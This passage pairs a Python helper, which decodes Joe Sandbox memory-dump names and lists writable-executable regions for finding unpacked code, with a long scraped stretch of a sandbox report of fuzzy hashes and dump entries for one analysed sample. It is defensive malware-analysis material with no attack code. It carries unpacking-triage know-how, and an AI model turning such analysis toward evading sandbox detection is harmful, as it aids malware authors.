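    def region_type(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def is_dump_name(name: str) -> bool:
    return DUMP_NAME_RE.fullmatch(name) is not None


def parse_dump_name(name: str) -> DumpName:
    """Split one *.sdmp name into its fields; reject anything else loudly."""
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    try:
        f = [int(p, 16) for p in parts[:8]]
    except ValueError as exc:
        raise ValueError(f"non-hex field in {name!r}") from exc
    return DumpName(f[0], f[1], parts[2], f[3], f[4], f[5], f[6], f[7])


def extract_dump_names(report_text: str) -> list:
    """Pull every dump name out of scraped report text, link residue and all."""
    return DUMP_NAME_RE.findall(report_text)


def rwx_regions(names) -> list:
    """(base, protection) of regions that are writable and executable, lowest
    address first: the dumps to open first when hunting for unpacked code."""
    regions = [parse_dump_name(n) for n in names]
    return sorted((r.base, r.protection) for r in regions if r.executable and r.writable)


# Sample input: a subset of this report's Memory Dump Source entry, copied as
# scraped (with the "Download File" link text glued onto each name).
REPORT_EXCERPT = """\
• Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
"""

if __name__ == "__main__":
    for base, prot in rwx_regions(extract_dump_names(REPORT_EXCERPT)):
        print(f"{base:#010x}  {prot}")
```

On this entry every region except the one at 0x00E10000 (PAGE_READWRITE) decodes as executable and writable, and all carry the MEM_IMAGE type, so they are pages of the loaded module itself rather than separately allocated private memory; that is the pattern to expect when a packer rewrites its own sections in place. The decoder treats the protection field strictly as a winnt.h value and keeps the remaining fields raw, so it will not silently misread a name whose layout differs from the one seen here.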
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: 062ad8959de45b9bc242d5a48941dcc7b08a399602919a66bab415b6d27e4238
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: F2F17AA220C6914BC71D8A1494B08BD7FD29BA9201F4E8AADFDD71F383D920DA05DB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: 27ee36fd71d4f3bfeeac358a8d841c3b2103cfba05c798b91187ad47d822f5be
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 8ED18773F10A254BEB08CE99DD913ADB6E2EBD8350F19423ED916F7381D6B89D018790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 2b55d5f199baa0bf22a899b1b8bf3c52e7cec58739eea6333c6c8399afc6e831
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 99027874E006598FCF26CFA8C4905EDBBB6FF89350F548159E889BB355C730AA91CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: 97b8961ebb198d629de6f5fb2ba7179ed4d42f16db45d34c003bfe63eef4c494
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: CF020175E006198FCF15CF98D8809ADB7B6FF88350F258169E849BB351D731AA91CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction ID: 14f9d3a276e87123a6891f99765dfea3842fbc4eb1add205e1ed3f28c7cae76e
                                        • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                        • Instruction Fuzzy Hash: 4EC15D76E29B814BE713973DD802265F395AFE7294F19D72FFCE872942EB2096814304
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction ID: 00caf3a832cd3b5fba0cfacaca81373c5e0753fa80bf68849ef5b4a916c6b020
                                        • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                        • Instruction Fuzzy Hash: 49B13636E442999FCB26CB64CA583EDFFB2AF62304F19D15AD4487B286DB344D81C790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction ID: 4f2a2b26ba3498e7fc3263d2158bf2e35a4e262aa6d1ac907d7ad76b4d6f65c8
                                        • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                        • Instruction Fuzzy Hash: F6D15870600B40CFD725CF29C494BA7B7E0FB89304F54992ED89A9BB52DB35E845CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction ID: 87f1ccbbb8bb9238af17f6aa029c6b2de55991b1771e5402466ca90bad7b92a4
                                        • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                        • Instruction Fuzzy Hash: 85D15DB464C3808FD7148F11D4A432BBFE0AF95748F18995EE4D92B391C3BA8948DF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction ID: c5df2e00cbf41b2bd139128be59da19d8081b9235aa3dc42444c50227aa3ac0d
                                        • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                        • Instruction Fuzzy Hash: AAB1B172A083515BD308CF25C89136BF7E2EFC8314F1AC93EF89997280D774D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: 298f368e8432b949f1c4942db675b5f5bff49b3cdc132caf692e1cc48984cc42
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: FCB18F72E083115BD308CF25C89176BF7E2EFC8310F5AC93EB89997291D778D9459A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 48f9beaed848d18b333669902aca8cc8b065dee3afd86d840df6afde64b55574
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 25B12671A093118FD706EE39D481225F7E1EFE6280F51C72EF9A5B7662EB31E8818740
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 98739bbeb78db1c2cbdec324721ff68334fcd2b92552247d7ede6cc948e9e11c
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: F991B271A002118FDF15EEA8DC80BBAB3A4EF55304F19656DEA1CBB292D372DD05C7A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 80abfca7c6b3b9e7ce174b7b25ad4176e64ca63c7d75ad0858bf15459a9c5493
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: 19B14C316106099FDB29CF2CC48ABA47BE0FF45368F25965CE899DF2A2C735D991CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: f13c479709fb483572a52d79bd974956e94e8e493a970548298eb427ce963631
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: CAC14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E996CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: f4c1a4dd7f5402c4dc97c4adc9f235aca425f596315012ac329b1b5fa142608c
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 68913731928791AAFB169B3CCC427AAB7A4FFE6350F14D31AF98C72491FB7185818345
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: 85f0aa4d196e79d2498027ff6e9a14467f1d4e3b783a1e8f14a1b2c0738eea7b
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 0BA11BB2A14A19CBEB19CF55CCC1A9ABBB1FB58314F14D62AD41EE72A0D334A944CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 833a2a4281e0a48c236d77154a842ab9854ca299c59facc3fd377cea03692fa6
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 53A170B2E083119BD308CF25C89075BF7E2EFC8714F1ACA3DA89997254D774E9449B82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f98a6142e1a7b09766acb9e6f9146da93b4612257ca90344c3b298df36dc4f94
                                        • Instruction ID: 3d0c9598411b23a74df119259b3db475c6a2ab10b70a6484320167f19425fbca
                                        • Opcode Fuzzy Hash: f98a6142e1a7b09766acb9e6f9146da93b4612257ca90344c3b298df36dc4f94
                                        • Instruction Fuzzy Hash: 5F7139F3A085008BF30CAE29DC1573AB6E6EFD4310F1AC63DD7C687784E93948068646
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
